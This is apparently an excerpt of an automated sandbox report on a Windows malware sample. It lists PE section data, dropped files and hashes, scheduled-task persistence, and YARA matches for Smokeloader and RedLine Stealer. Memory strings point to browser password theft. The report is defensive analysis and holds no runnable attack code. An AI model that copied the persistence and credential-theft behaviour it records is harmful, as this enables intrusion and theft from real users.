Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C73B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C73B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C73B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6DF280

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File created: C:\Windows\Tasks\explorti.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\TrainsSexcam
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\GamingNat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\PermitLite
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\JennyArtistic
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\PolyphonicWeblog
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\SgLaid
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\FacingLone
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\GeniusRepeat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\EditedRights
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\XiMilton
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\MissWheat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D35A0	0_2_6C6D35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74545C	0_2_6C74545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E5440	0_2_6C6E5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74542B	0_2_6C74542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715C10	0_2_6C715C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722C10	0_2_6C722C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74AC00	0_2_6C74AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C716CF0	0_2_6C716CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DD4E0	0_2_6C6DD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E64C0	0_2_6C6E64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD4D0	0_2_6C6FD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7334A0	0_2_6C7334A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73C4A0	0_2_6C73C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6C80	0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C700512	0_2_6C700512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EFD00	0_2_6C6EFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FED10	0_2_6C6FED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7385F0	0_2_6C7385F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710DD0	0_2_6C710DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C746E63	0_2_6C746E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC670	0_2_6C6DC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C713E50	0_2_6C713E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4640	0_2_6C6F4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722E4E	0_2_6C722E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F9E50	0_2_6C6F9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C739E30	0_2_6C739E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C717E10	0_2_6C717E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C725600	0_2_6C725600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7476E3	0_2_6C7476E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DBEF0	0_2_6C6DBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EFEF0	0_2_6C6EFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C734EA0	0_2_6C734EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73E680	0_2_6C73E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F5E90	0_2_6C6F5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C717710	0_2_6C717710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E9F00	0_2_6C6E9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706FF0	0_2_6C706FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DDFE0	0_2_6C6DDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7277A0	0_2_6C7277A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71F070	0_2_6C71F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8850	0_2_6C6F8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD850	0_2_6C6FD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71B820	0_2_6C71B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C724820	0_2_6C724820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E7810	0_2_6C6E7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC0E0	0_2_6C6FC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7158E0	0_2_6C7158E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7450C7	0_2_6C7450C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7060A0	0_2_6C7060A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72B970	0_2_6C72B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74B170	0_2_6C74B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ED960	0_2_6C6ED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FA940	0_2_6C6FA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70D9B0	0_2_6C70D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC9A0	0_2_6C6DC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715190	0_2_6C715190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C732990	0_2_6C732990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C719A60	0_2_6C719A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71E2F0	0_2_6C71E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F1AF0	0_2_6C6F1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718AC0	0_2_6C718AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C742AB0	0_2_6C742AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D22A0	0_2_6C6D22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704AA0	0_2_6C704AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ECAB0	0_2_6C6ECAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74BA90	0_2_6C74BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EC370	0_2_6C6EC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D5340	0_2_6C6D5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71D320	0_2_6C71D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7453C8	0_2_6C7453C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DF380	0_2_6C6DF380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78AC60	0_2_6C78AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C846C00	0_2_6C846C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DECD0	0_2_6C7DECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85AC30	0_2_6C85AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77ECC0	0_2_6C77ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C816D90	0_2_6C816D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90CDC0	0_2_6C90CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C908D20	0_2_6C908D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784DB0	0_2_6C784DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8AAD50	0_2_6C8AAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84ED70	0_2_6C84ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C806E90	0_2_6C806E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820EC0	0_2_6C820EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C860E20	0_2_6C860E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78AEC0	0_2_6C78AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81EE70	0_2_6C81EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C8FB0	0_2_6C8C8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EEF40	0_2_6C7EEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786F10	0_2_6C786F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85EFF0	0_2_6C85EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C780FE0	0_2_6C780FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0F20	0_2_6C8C0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78EFB0	0_2_6C78EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842F70	0_2_6C842F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0820	0_2_6C7D0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8868E0	0_2_6C8868E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A820	0_2_6C80A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C854840	0_2_6C854840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8960	0_2_6C7B8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8109A0	0_2_6C8109A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83A9A0	0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8409B0	0_2_6C8409B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89C9E0	0_2_6C89C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D6900	0_2_6C7D6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B49F0	0_2_6C7B49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FCA70	0_2_6C7FCA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82EA00	0_2_6C82EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838A30	0_2_6C838A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FEA80	0_2_6C7FEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820BA0	0_2_6C820BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C886BE0	0_2_6C886BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8AA480	0_2_6C8AA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798460	0_2_6C798460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81A4D0	0_2_6C81A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E4420	0_2_6C7E4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C64D0	0_2_6C7C64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A430	0_2_6C80A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E2560	0_2_6C7E2560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8540	0_2_6C7D8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84A5E0	0_2_6C84A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80E5F0	0_2_6C80E5F0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9009D0 appears 137 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7A3620 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C90DAE0 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C70CBE8 appears 134 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504

Source: build2[1].exe.20.dr	Static PE information: Number of sections : 11 > 10
Source: build2.exe.20.dr	Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000000.2003380792.000000000244C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ba77748b9b.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: random[1].exe.0.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: enter[1].exe.0.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: enter[1].exe.0.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675
Source: axplong.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: axplong.exe.5.dr	Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: explorti.exe.8.dr	Static PE information: Section: ZLIB complexity 0.999877262636612
Source: explorti.exe.8.dr	Static PE information: Section: owfltkii ZLIB complexity 0.9940620272314675

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@100/171@31/20

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C737030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\CFKWDMI0.htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3144
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess616

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\1000003002\ead6a72944.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe"

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2115692491.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2116022880.0000000002797000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2095025056.0000000022C69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2441347457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
